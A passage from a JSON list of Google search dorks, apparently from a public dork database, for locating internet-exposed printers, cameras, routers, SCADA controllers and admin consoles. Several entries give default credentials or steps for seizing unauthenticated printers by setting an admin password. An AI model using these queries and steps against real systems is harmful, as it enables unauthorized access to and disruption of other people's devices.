LASER JET printers without login\nBy Sivabalan ( CYBER GENIUS )..."}, {"dork": "inurl:/index.htm?cat=info&pagesRemaining", "description": "inurl:/index.htm?cat=info&pagesRemaining\nDescription: This google dork can access many HP LASER JET PRO printer..\nBy Sivabalan( CYBER GENIUS ) ..."}, {"dork": "inurl:/index.htm?cat=info&printerInfo", "description": "inurl:/index.htm?cat=info&printerInfo\nDescription : This google dork can access many HP LASER JET printers without login..\nBy Sivabalan ( CYBER GENIUS )"}, {"dork": "\"IPSentry - Device Statistics Information\"", "description": "This Dork show Device Statistics Information, about a lot of network\ninfraestructures xD. Enjoy Healthy.\nDork Discovered for Rootkit Pentester."}, {"dork": "\"Web page sent by InterMapper\"", "description": "Dork with funny maps of networks.\nDork by Rootkit Pentester.\nRegards."}, {"dork": "intitle:\"homematic webui\"", "description": "Description: WebUI for Homematic Home-Control-System\nGoogle search : intitle:\"homematic webui\"\nAuthor : BasisX & DonJoe"}, {"dork": "intitle:webcam 7 inurl:8080 -intext:8080", "description": "Dork with webcams servers.\nEnjoy with the view.\nDork by Rootkit Pentester.\nRegards."}, {"dork": "inurl:login inurl:user inurl:pass -intext:pass -intext:user", "description": "With this Dork you can Bypass the security of a lot of Cpanel Portal.\nHave Fun.\nDork discovered by Rootkit Pentester."}, {"dork": "inurl:\"topPage.cgi\" | inurl:\"mainFrame.cgi\" intext:\"Web Image Monitor\"", "description": "Description: Web Image Monitor allows users to remotely monitor and\nchange the network configuration of Ricoh copiers, multifunctions and\nprinters via common web browsers\nGoogle search: inurl:\"topPage.cgi\" | inurl:\"mainFrame.cgi\" intext:\"Web\nImage Monitor\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"SyncThru Web Service\" inurl:\"sws\"", "description": "Description: Samsung printer web panel\nGoogle search: intitle:\"SyncThru Web Service\" inurl:\"sws\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"home.htm?cat=home\" | inurl:\"index.htm?cat=info\" | inurl:\"index.htm?cat=settings\" | inurl:\"index.htm?cat=network\" | inurl:\"index.htm?cat=bluetooth\"", "description": "Description: HP OfficeJet printer web panel\nGoogle search: inurl:\"home.htm?cat=home\" | inurl:\"index.htm?cat=info\"\n| inurl:\"index.htm?cat=settings\" | inurl:\"index.htm?cat=network\" |\ninurl:\"index.htm?cat=bluetooth\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"cgi-bin/dynamic/\" inurl:\"html\" intitle:\"Printer Status\"", "description": "Description: Dell Laser printer web panel\nGoogle search: inurl:\"cgi-bin/dynamic/\" inurl:\"html\" intitle:\"Printer Status\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"TRENDnet\" (inurl:\"top.htm\"| inurl:\"STSSYS.HTM\"| inurl:\"AVIEW.HTM\"| inurl:\"JPlug.htm\" | inurl:\"JVIEW.HTM\")", "description": "Description: TRENDnet IP camera\nGoogle search: intitle:\"TRENDnet\" (inurl:\"top.htm\"|\ninurl:\"STSSYS.HTM\"| inurl:\"AVIEW.HTM\"| inurl:\"JPlug.htm\" |\ninurl:\"JVIEW.HTM\")\nAuthor: nebo_oben"}, {"dork": "intitle:Tenda ADSL2/2+ Modem inurl:main.html", "description": "Description: Tenda ADSL2/2+ Modem with Wireless Router\nGoogle search: intitle:Tenda ADSL2/2+ Modem inurl:main.html\nAuthor: nebo_oben"}, {"dork": "intitle:\"Residential Gateway Configuration:\" intext:\"Cable Modem Information.\"", "description": "Various online cable modem devices! More info:\nhttp://www.ubeeinteractive.com \nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "intext:\"powered by webcamXP 5\"", "description": "Various webcamXP version 5! More info: http://webcamxp.com\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:lg intitle:\"Looking Glass\"", "description": "Panels with lot of information of bgp and ping, tracert services and more\nxD.\nBest Regards.\nRootkit Pentester."}, {"dork": "inurl:/view/viewer_index.shtml", "description": "inurl:/view/viewer_index.shtml \nUsing this google dork can access various camera LIVE AXIS MODEL around the world ..\nTHis google dork is created by CYBER GENIUS ( SIVABALAN )."}, {"dork": "inurl:userRpm inurl:LoginRpm.htm", "description": "The below dork can list all the TPLink routers available.inurl:userRpm inurl:LoginRpm.htm\nRegards,\nSrini"}, {"dork": "/@fmb80_encoder.htm", "description": "Hi !\nI'm a sound technicien in radio fm world\nThis dork give u acces to digiplexer (u can change text of all the listener of a FM radio in there car for exemple : ) )\npeace"}, {"dork": "inurl:/awcuser/cgi-bin/", "description": "Google Dork for Mitel systems:\ninurl:/awcuser/cgi-bin/\n@_aliardic_"}, {"dork": "inurl:top.htm inurl:currenttime", "description": "Dork with a lot of cameras online.\nEnjoy Healthy.\nRegards.\nDork by Rootkit Pentester."}, {"dork": "inurl:/Portal/Portal.mwsl", "description": "This is a dork for the Siemens S7 series of PLC controllers. (SCADA)\nPs. Some are unrestricted\n*Supernova*"}, {"dork": "inurl:/mjpgmain.asp", "description": "Name = Live view of Y-cam\nGoogle dork Description:\ninurl:/mjpgmain.asp\nDate: 2016-10-19\nAuthor: Devendra Singh Solanki"}, {"dork": "inurl:\"-/monitoring\" \"statistics of JavaMelody\"", "description": "Monitoring of JavaEE applications.\nPermit to visualize sql request, expire current http user sessions, gather\nsystem information etc ...\nPrunier Charles-Yves"}, {"dork": "\"Upload\" inurl:\"https://webfiles\"", "description": "This dork finds pages vulnerable to directory traversal, upload and download of files.\nDork: \"Upload\" inurl:\"https://webfiles\"\n-Gee"}, {"dork": "inurl:\"apc.php\" intitle:\"APC INFO\"", "description": "# Google Dork: inurl:\"apc.php\" intitle:\"APC INFO\"\n# Date: 11/1/2016\n# Author: Mk0Underground"}, {"dork": "intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET intext:POST inurl:op", "description": "Google Dork: intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET\nintext:POST inurl:op\nAuthor: Aconite33\nDescription: Identify vulnerable sites that have SOAP, POST/GET functions"}, {"dork": "intitle:\"Login\" inurl:\"/doc/page/login.asp\"", "description": "Interface for HikVision web cam\nGoogle Dork: intitle:\"Login\" inurl:\"/doc/page/login.asp\"\nDate: 2016-11-28\nAuthor: Devendra Singh Solanki"}, {"dork": "site:webex.com inurl:tc3000", "description": "This dorks can access to some meetings information. \nsite:webex.com inurl:tc3000\nsite:webex.com inurl:siteurl=meetings"}, {"dork": "intitle:\"Log In to AR Web\"", "description": "Huawei AR Routers login panels\nGoogle Dork: intitle:\"Log In to AR Web\"\nDate: 2016-12-14\nAuthor: Devendra Singh Solanki"}, {"dork": "inurl:\"/html/modeminfo.asp?", "description": "at&t and NetGear router information.\nAlso\ninurl:\"/html/login.asp?\" intext:\"REMOTE ACCESS IS CURRENTLY ENABLED.\"\n-Xploit"}, {"dork": "\"All site content\" ext:aspx", "description": "Dork for locate Sharepoint Administration webs.\nEnjoy healthy.\nDork made by Rootkit Pentester."}, {"dork": "inurl:\"/viewlsts.aspx?BaseType=\"", "description": "SharePoint Files \nAlso,\ninurl:\"/mWord.aspx?doc=\"\ninurl:\"/mXL.aspx?doc=%2\"\ninurl:\"/mPPT.aspx?doc=\"\n-Xploit"}, {"dork": "inurl:cgi-bin \"ARRIS Enterprises\"", "description": "Dork for Panels ARRIS Router.\nEnjoy healthy.\nDork made by Rootkit Pentester."}, {"dork": "inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html'", "description": "Dork:\nFind a List of FTP Servers by IP address, mostly Windows NT servers with\nguest login capabilities.\nExample:\ninurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh)\n~'/html' -'pub' -'public' -'mp3' -fossies -websvn -svn -git -login -.de\n-.fl -.ru -.jp -.kr -.ch -.dk -.edu -dorks -google -Google -.gov -prevent\n-help -how -reset -your -developer -reference -support -github admin\nAnything with \"-\" in the beginning is used to help combat the fact that\ngoogle does not really want us to see all of the results. If we do not\nfilter through, google will mark us as a bot user and block our ip address.\nThe \"do not search\" expression is as important as the term or phrase we\nwish to search and match for.\nThanks,\nMrM"}, {"dork": "inurl:\"/graphs\" intext:\"Traffic and system resource graphing\"", "description": "View results for mikrotik graphics interfaces\ninurl:\"/graphs\" intext:\"Traffic and system resource graphing\"\nVer\u00f3nica Ovando (AKA verovan)"}, {"dork": "inurl:cgi-bin/lsnodes_web?node", "description": "Dork for status node of radios online.\nDork by Rootkit Pentester."}, {"dork": "inurl:\"/HtmlAdaptor?action=\"", "description": "JBoss JMX-Console MBean Viewer\nHere are also more dorks. \nintitle:JMX MBean View inurl:/jmx-console/HtmlAdaptor?action\nintitle:\"MBean Inspector\"\ninurl:\"jmx-console/HtmlAdaptor?\" JMX MBean\n-Xploit"}, {"dork": "intext:VIEWS \u00b7 Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES \u00b7 Browse \u00b7 Structure \u00b7 SQL \u00b7 Search \u00b7 Export", "description": "Description : This google dork can access many websites phpmyadmin web server.\nGoogle dork: intext:VIEWS \u00b7 Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES \u00b7 Browse \u00b7 Structure \u00b7 SQL \u00b7 Search \u00b7 Export.\nThis google dork created by dekingofcyber( SIVABALAN )"}, {"dork": "inurl:guestimage.html", "description": "Mobotix cameras online.\r\n\r\nBy Rootkit Pentester."}, {"dork": "inurl:\"set_config_networkIPv6.html\"", "description": "Finds lots of HP colour printers hooked up to the internet\r\n\r\nDxtroyer"}, {"dork": "\"Use these fields to set or change the Administrator Password. When set, the Administrator Password is required before you can access and change configuration parameters. To disable the Administrator Password, leave the entries blank.\"", "description": "The following Google search gives output of HP printers whose authentication\r\nis not set. Hence an attacker can simply visit the links from the dork\r\noutput to set Administrator Password .\r\n\r\n\r\n\"Use these fields to set or change the Administrator Password. When set, the\r\nAdministrator Password is required before you can access and change\r\nconfiguration parameters. To disable the Administrator Password, leave the\r\nentries blank.\"\r\n\r\n \r\nOnce the password is set, the attacker gets admin access to the HP printer.\r\nThis can be used to cause disruption.\r\n\r\n\r\nAnkit Anubhav, NewSky Security"}, {"dork": "inurl:\"ews/setting/setews.htm\"", "description": "The google dork leads to various Dell/DocuPrint printers whose authentication is not set.\r\nAn attacker can set a new password and restart printer to apply new settings.\r\nOnce a new password is created, the attacker can disrupt the printer or take control of it remotely for data theft.\r\n\r\nAnkit Anubhav,NewSky Security"}, {"dork": "inurl:\"/address/speeddial.html?start\" and intext:\"Please configure the password\" and intitle:\"Brother\"", "description": "The following dork gives the list of Brother Printers whose panels do not have an administrator password.\r\n\r\nSteps to take control of the Brother printer ::\r\n\r\n\r\n 1. Use the dork to get the list of Brother printers whose password is not configured. The user will get output like hxxp://{URL}/address/speeddial.html?start=1&pageid=10\r\n 2. Extract the URL/IP and construct a URL like hxxp://{URL}/admin/password.html\r\n 3. This URL will lead the attacker to the page where administrator password can be set.\r\n\r\nAnkit Anubhav, NewSky Security"}, {"dork": "inurl:\"/websys/webArch/mainFrame.cgi\" -hatana", "description": "Finds vulnerable printers\r\n\r\nDxtroyer"}, {"dork": "inurl:\"apps/console/sepm\"", "description": "This dork will provide you all the Semantec Endpoint managers , that not\r\nbeing configured properly,\r\n\r\n\r\nRegards\r\n\r\nfu2x2000"}, {"dork": "intitle:\"Status & Control\" + \"Thermostat Status\" +\"HVAC Settings\" +\"Zone Temperature\"", "description": "The dork gives output as a list of smart (Network/NT) thermostats.\r\nWithout authentication, a viewer can get information like Zone Temperature and other thermostat settings.\r\n\r\nAnkit Anubhav, NewSky Security"}, {"dork": "inurl:embed.html inurl:dvr", "description": "Dork who show live cams and tv.\r\nDork by Rootkit Pentester."}, {"dork": "intitle:Armstrong Hot Water System Monitoring", "description": "Armstrong Hot water System Monitoring\r\n\r\ndefault credentials:\r\n\r\nuser: armstrong\r\npass: brainscan\r\n\r\n-- \r\n@ak1t4\r\nWhiteHat Hacker - Security Analyst - Bug Bounty Hunter\r\n\r\nhackerone.com/ak1t4\r\ntwitter.com/knowledge_2014"}, {"dork": "inurl:\"/cgi-bin/filemanager/Manager.pl\"", "description": "Google dork for iDC File Manager.\r\n\r\niDC File Manager is a secure multi user web based File Management\r\nSystem, that allows you to store, manage and share every format of\r\ndigital media, including, documents, images, audio, video, publishing\r\nlayouts, presentations and PDF files Between you and your end users.\r\n\r\nIf your Company has a requirement to distribute or share files with\r\ncustomers, suppliers, remote workers or just internally, then iDC File\r\nManager is the best solution for you."}, {"dork": "inurl:/add_vhost.php?lang=", "description": "inurl:/add_vhost.php?lang=\r\n\r\nNisankh Acharjya"}, {"dork": "\"ADS-B Receiver Live Dump1090 Map \"", "description": "Dork who show traffic air for ADS-B Receiver.\r\n\r\nDork by Rootkit_Pentester."}, {"dork": "inurl:public \"Powered by SecureW2\"", "description": "Software for wifi access points.\r\nDork by Rootkit Pentester"}, {"dork": "inurl:cloud_main.asp", "description": "# Google Dork: [inurl:cloud_main.asp]\r\n\r\n# Date: [02/03/2018]\r\n\r\n# Exploit Author: [MikiDiCalenella]\r\n\r\nDescription: web ui for Asus Aicloud"}, {"dork": "inurl::5601/app/kibana", "description": "Check this out multiple ELK/Kibana management portal are open with no \r\ncreds on the default port 5601\r\n\r\n\r\nUsing this dork inurl::5601/app/kibana\r\n\r\nMore results could be found on shodan as well.\r\n\r\nBR\r\n\r\n\r\nZiad Khalil\r\n\r\n@z0day"}, {"dork": "inurl:control/camerainfo", "description": "Dashboard with info of a lot of webcams!!!\r\n\r\n\r\nDork by Rootkit Pentester."}, {"dork": "intitle:\"Yawcam\" inurl:8081", "description": "# Dork Title: [unprotected Yawcam webcam]\r\n# Google Dork: [intitle:\"Yawcam\" inurl:8081]\r\n# Description: Access to unprotected Yawcam webcams via browser.\r\n# Date: [01/03/2018]\r\n# Dork Author: [Sohaib E.B.]\r\n# Vendor Homepage: [http://www.yawcam.com]"}, {"dork": "ext:php + inurl:\"ajaxfilemanager.php\" + intext:\"Current Folder Path\"", "description": "Ajax File Manager\r\n\r\n#p1x33l"}, {"dork": "intext:\"https://chat.whatsapp.com/invite/\" intitle:\"Your Search For Company/Subject/Whatever\"", "description": "# Exploit Title: WhatsApp Group / Easy Point to information gathering and Social Engineering\r\n# Google Dork: intext:\"https://chat.whatsapp.com/invite/\" intitle:\"Your Search For Company/Subject/Whatever\"\r\n\r\n# Dork Sample: intext:\"https://chat.whatsapp.com/invite/\" intitle:\"hacking\"\r\n# Dork Sample: intext:\"https://chat.whatsapp.com/invite/\" intitle:\"target company\"\r\n\r\n# Date: 07/04/2018\r\n\r\n# Contains sensitive information:\r\n Link for Public And Private Groups of WhatsApp\r\n\r\n# Dork Author: Carlos E. Vieira"}, {"dork": "inurl:\":2083/login/?user=\"", "description": "Cpanel that are logged in with Hosted Sites.\r\n\r\n\r\nAuthor: Parth S. Patel"}, {"dork": "inurl:report.cgi?dashboard=", "description": "Dork who show MaDDash panels of traffic the net.\r\n\r\nDork by Rootkit Pentester"}, {"dork": "intext:build:SVNTag= JBoss intitle:Administration Console inurl:web-console", "description": "JBoss AS management console.\r\n\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "inurl:\"mjpg/video.cgi?resolution=\"", "description": "inurl:\"mjpg/video.cgi?resolution=\" || inurl:\"mjpg/video.cgi\"\r\n\r\nThis dork show a lot of videp.cgi pages!!!\r\n\r\nManhNho"}, {"dork": "intitle:Munin :: overview", "description": "intitle:Munin :: overview\r\n\r\nMunin - Open Source System Monitoring system (No Auth)\r\n\r\nManhNho"}, {"dork": "inurl:jpegpull.htm", "description": "Dork show Webcams CCTV.\r\nEnjoy healthy.\r\n\r\nDork by Rootkit Pentester."}, {"dork": "intitle:'System Web Interface: WATTrouter M'", "description": "Dork about WATTrouter M SSR - programmable controller to optimize\r\nself-consumption of energy produced by photovoltaic or wind power plant\r\n\r\nintitle:'System Web Interface: WATTrouter M'\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intext:\"default values: admin/1234\"", "description": "intext:\"default values: admin/1234\"\r\n\r\ndefault password of WATTrouter M - System Web Interface\r\n\r\nManhNho"}, {"dork": "inurl:'/SSI/Auth/ip_configuration.htm'", "description": "Dork about internal IP exposures and configuration from HP Printer\r\n\r\ninurl:'/SSI/Auth/ip_configuration.htm'\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intext:\"Powered by www.yawcam.com\"", "description": "intext:\"Powered by www.yawcam.com\"\r\n\r\nintext:\"Password Please! User: Pass: Fps. Quality. Scale. Sound. \"\r\n\r\nYawcam cameras online\r\n\r\nManhNho"}, {"dork": "intitle:\"UltraDNS Client Redirection Service\"", "description": "intitle:\"UltraDNS Client Redirection Service\"\r\n\r\nUltraDNS client\r\n\r\nManhNho"}, {"dork": "(intitle:\"plexpy - home\" OR \"intitle:tautulli - home\") AND intext:\"libraries\"", "description": "Helps to locate unprotected (no user/password needed) Tautulli servers. Tautulli (Formerly PlexPy) is a 3rd party application for monitoring the activity and tracks various statistics of a Plex Media Server. More info: (https://tautulli.com)\r\n\r\nGerard Fuguet (gerard@fuguet.cat)"}, {"dork": "inurl:\"/gitweb.cgi?\"", "description": "Google dork *description: * A web-enabled interface to the open source\r\ndistributed version control system Git\r\n\r\n*Google Search: *inurl:\"/gitweb.cgi?\"\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "intext:\"Build dashboard\" intext:\"Project\" intext:\"Plan\" intext:\"Build\"", "description": "Detail: Can be used to find public facing build servers such as Bamboo\r\nGoogle Dork: intext:\"Build dashboard\" intext:\"Project\" intext:\"Plan\" intext:\"Build\"\r\nDate: 9-1-2018\r\nExploit Author: hehnope"}, {"dork": "site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view", "description": "# Google Dork: site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view\r\n# Date: 2018-09-15\r\n# Author: Akalanka Ekanayake (Jake Logan)\r\n# Vendor Homepage: https://securehacker.co.uk\r\n\r\nThis dork will help you to find out videos published in Google\r\ndrive.(Movies,Tv series,clips .etc)\r\n\r\nExample :\r\n\r\nsite:drive.google.com /preview *intext:tv series* inurl:flv | wmv |\r\nmp4 -pdf -edit -view\r\n\r\nsite:drive.google.com /preview *intext:tutorial* inurl:flv | wmv | mp4\r\n-pdf -edit -view\r\n\r\nsite:drive.google.com /preview *intext:720p *inurl:flv | wmv | mp4\r\n-pdf -edit -view"}, {"dork": "inurl:home.tcl intitle:gaia", "description": "Check Point Firewalls & Clusters\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:phpPgAdmin intext:\"Cappuccino\" | intext:\"Blue/Green\"", "description": "This dork will identifies websites that have phpPgAdmin ,a web-based\r\nadministration tool for PostgreSQL\r\n\r\nSandeep S S"}, {"dork": "intitle:\"SQLiteManager\" + intext:\"Welcome to SQLiteManager version \"", "description": "intitle:\"SQLiteManager\" + intext:\"Welcome to SQLiteManager version \"\r\n\r\nSQLite Manager panel\r\n\r\nManhNho"}, {"dork": "inurl:\"swagger-ui/index.html\"", "description": "Searching for the unprotected swagger APIs link."}, {"dork": "intitle:\"Swagger UI - \" + \"Show/Hide\"", "description": "swagger APIs link\r\n\r\nManhNho"}, {"dork": "inurl:/sample/LvAppl/lvappl.htm", "description": "[*] Dork: inurl:/sample/LvAppl/lvappl.htm\r\n\r\nDork to find Network Camera Server\r\n\r\nDrok3r"}, {"dork": "allinurl:control/multiview", "description": "[*] Dork: allinurl:control/multiview\r\n\r\n[i] Con este dork, podemos encontrar camaras CCTV MOBOTIX expuestas online\r\n\r\nDrok3r"}, {"dork": "allinurl:DialogHandler.aspx", "description": "Sites running Telerik Web UI Dialog Handler\r\n\r\nallinurl:DialogHandler.aspx\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intitle:\"VertrigoServ\" + \"Welcome to VertrigoServ\"", "description": "unauthenticated WAMP - admin panel\r\n\r\nManhNho"}, {"dork": "inurl:/certsrv/certrqus.asp", "description": "Author: Mattias Borg (Sec-Labs R&D)"}, {"dork": "inurl:/help/lang/en/help", "description": "Find MOBOTIX Cameras\r\n\r\nGuest View\r\n/cgi-bin/guestimage.html\r\nMulti View\r\n/control/multiview\r\n\r\nBy TheCrypticSailor"}, {"dork": "inurl:public.php inurl:service ext:php", "description": "Files and Folders in the cloud.\r\n\r\nDork by Rootkit Pentester."}, {"dork": "intitle:ProFTPD Admin - V1.04", "description": "intitle:ProFTPD Admin - V1.04\r\n\r\nwill show you admin page, no login needed\r\n(by XLOMBOX)"}, {"dork": "intitle:\"VB Viewer\"", "description": "This search finds several more webcams or IPCams\r\n\r\nintitle:\"VB Viewer\"\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle: \"Nexus Repository Manager\"", "description": "*Google dork description: *Sites running the Nexus Repository Manager\r\n\r\n*Google Search:* intitle: \"Nexus Repository Manager\"\r\n\r\n*Submitted by:* Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "inurl:/setup.cgi@next_file=", "description": "Unauthorized Cisco LinkSys wireless\r\n\r\nManhNho"}, {"dork": "\"Please click here to download and install the latest plug-in. Close your browser before installation.\"", "description": "# Exploit Title: NVR Login Portal.\r\n# Google Dork: \"Please click here to download and install the latest plug-in. Close your browser before installation.\"\r\n# Description: Find NVR (Network Video Recorder) login portals.\r\n# Date: 18/01/2019.\r\n# Exploit Author: Sohaib E.B.\r\n# Category: Pages Containing Login Portals"}, {"dork": "intitle:QueryService Web Service", "description": "# Google Dork: intitle:QueryService Web Service\r\n# Description: QueryService Web Service exposed to internet\r\n# Date: 2019-01-27\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "intitle:\"Device(\" AND intext:\"Network Camera\" AND \"language:\" AND \"Password\"", "description": "Dork about ReeCam IP Camera\r\n\r\nintitle:\"Device(\" AND intext:\"Network Camera\" AND \"language:\" AND \"Password\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intext:\"Any time & Any where\" AND \"Customer Login\"", "description": "Dork about Avtech - Video Surveillance Technology\r\nSeveral login panels\r\n\r\nintext:\"Any time & Any where\" AND \"Customer Login\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"Screenly OSE\" intext:\"Schedule Overview\" AND \"Active Assets\" AND \"Inactive Assets\"", "description": "Dork about Screenly OSE\r\nIs the most popular open source digital signage software for the Raspberry Pi\r\n\r\nintitle:\"Screenly OSE\" intext:\"Schedule Overview\" AND \"Active Assets\" AND \"Inactive Assets\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "inurl:\"fhem.cfg\" AND 'fhem.cfg' -github", "description": "Dork about FHEM - Perl server for house automation (configuration files)\r\n\r\ninurl:\"fhem.cfg\" AND 'fhem.cfg' -github\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"webcam 7\" inurl:'/gallery.html'", "description": "Dork about webcams and ip cameras server for windows\r\n\r\n\r\nintitle:\"webcam 7\" inurl:'/gallery.html'\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"Login - Xfinity\" AND \"Gateway > Login\"", "description": "Dork about login panels of Xfinity Routers\r\n\r\n\r\nintitle:\"Login - Xfinity\" AND \"Gateway > Login\"\r\n\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle:\"Home-CUPS\" intext:printers -mugs", "description": "CUPS printer deamons\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/snap.cgi?&-getpic", "description": "Exposes a number of Master IP CAM 01 IP camera's\r\n\r\nMidori'SH\r\nhttps://twitter.com/MidoriShell"}, {"dork": "allinurl:asdm.jnlp", "description": "Find Cisco ASDM Appliance:\r\n\r\n\r\nallinurl:asdm.jnlp\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intitle:\"NetcamSC IP Address\"", "description": "Reveals ip address\r\n\r\nRegards\r\nHussain Vohra"}, {"dork": "\"/1000/system_information.asp\"", "description": "Find Pioneer router control panels. no login needed.\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:8000/portal/", "description": "inurl:8000/portal/"}, {"dork": "inurl:/portal/apis/fileExplorer/", "description": "inurl:/portal/apis/fileExplorer/"}, {"dork": "intitle:'Welcome to JBoss AS'", "description": "*Search: * JBoss Administrator Console\r\n*Google Dorks:*intitle:'Welcome to JBoss AS'\r\n*Default Credentials:* admin:admin\r\n\r\n*Author:* Rishabh Sharma (Lazy Hacker)"}, {"dork": "\"Powered by Trac 1.0.2\"", "description": "Find Reporting-based websites that are using Trac.\r\n\r\n~ CrimsonTorso"}, {"dork": "Find 3cx Phone System Management Console", "description": "Find 3cx Phone System Management Console\r\n\r\n\r\nallintitle:\"3cx phone system management console\"\r\n\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "site:azurewebsites.net inurl:.gov | .mil | .edu", "description": "*Google Dork:* site:azurewebsites.net inurl:.gov | .mil | .edu\r\n\r\n*Description: *Here is a Google Dork that reveals a large footprint of all\r\n.gov, .edu, and, .mil websites that are hosted and setup on Microsofts\r\nAzure cloud platform.\r\n\r\n*By:* edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "\"This service is powered by a copy of ZendTo\"", "description": "Find websites using ZendTo software, which includes File Upload & Login\r\nportals.\r\n~ CrimsonTorso"}, {"dork": "inurl:/signin.php?ret=", "description": "This dork will return websites which are running ShoreTel Connect\r\nconferencing portals.\r\n\r\nRamikan"}, {"dork": "\"Powered by ViewVC 1.0.3\"", "description": "Find open file access and databases through ViewVC.\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:/pages/default.aspx | inurl:/p\u00e1ginas/default.aspx", "description": "# Google Dork: inurl:/pages/default.aspx | inurl:/p\u00e1ginas/default.aspx\r\n# Description: Google Dork to find default sharepoint applications\r\n# Date: 2019-09-12\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:TOP/PRTINFO.HTML", "description": "inurl:TOP/PRTINFO.HTML\r\n \r\nFound Epson printer without password administrator.\r\n \r\nMy name : EJUPI B\u00e9kim"}, {"dork": "inurl:/clusters intitle:\"kafka Manager\"", "description": "Manage/Monitor sensitive information in Kafka.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "intext:\"series Network Configuration\" AND intext:\"canon\"", "description": "intext:\"series Network Configuration\" AND intext:\"canon\"\r\n \r\nFound CANON device\r\n \r\nAuthor : EJUPI B\u00e9kim"}, {"dork": "inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true", "description": "# Google Dork: inurl:/web-console/ServerInfo.jsp | inurl:/status?full=true\r\n# Description: Google Dork to find JBoss Management Console Server Information or tomcat status\r\n# Date: 2019-05-15\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/", "description": "# Google Dork: inurl:/CFIDE/administrator/index.cfm | inurl:/CFIDE/componentutils/login.cfm | inurl:/CFIDE/main/ide.cfm | inurl:/CFIDE/wizards/\r\n# Description: Google Dork to find ColdFusion management interfaces exposed online\r\n# Date: 2019-05-15\r\n# Author: Miguel Santareno\r\n# Contact: https://www.linkedin.com/in/miguelsantareno/"}, {"dork": "intitle:\"LaserJet\" \"Device status\" \"Supplies summary\"", "description": "This Dork finds HP MFP devices that have their management interface exposed to the Internet.\r\n\r\n\r\n# Exploit Title: HP MFP Devices\r\n# Google Dork: intitle:\"LaserJet\" \"Device status\" \"Supplies summary\"\r\n# Date: May 22, 2019\r\n# Exploit Author: Robert Marmorstein\r\n# Vendor Homepage: https://www8.hp.com/us/en/home.html"}, {"dork": "intitle:\"Pi-hole Admin Console\"", "description": "Description: Find Pi-Hole Admin Consoles\r\n\r\nAuthor: Fabio Stoll (Fastor)"}, {"dork": "intext:\" Welcome to DSL-2730B Web Management\"", "description": "Google Dork: intext:\" Welcome to DSL-2730B Web Management\"\r\n\r\nDlink DSL-2730B Web Management"}, {"dork": "inurl:/_cat/indices/", "description": "Dork connected to latest Orvibo database leak.\r\n\r\nRegards\r\nbaxter21"}, {"dork": "inurl:8443 AND -intitle:8443 AND -intext:8443 prohibited|restricted|unauthorized", "description": "Interesting content/portals hosted on non-standard ports.\r\n\r\ninurl:8443 AND -intitle:8443 AND -intext:8443\r\nprohibited|restricted|unauthorized\r\n\r\nAlternatively this can be replaced with\r\n\r\ninurl:8080 AND -intitle:8080 AND -intext:8080\r\nprohibited|restricted|unauthorized\r\n\r\nD"}, {"dork": "inurl:app/kibana intext:Loading Kibana", "description": "# Exploit Title: Kibana Login no credentials\r\n\r\n# Google Dork: inurl:app/kibana intext:Loading Kibana\r\n\r\n#Author: Francis Al Victoriano"}, {"dork": "inurl:ftp://ftp", "description": "Detecting ftp sites:\r\n\r\ninurl:ftp://ftp\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:ftp://ftp robots.txt", "description": "finding robots.txt in ftp sites:\r\n\r\ninurl:ftp://ftp 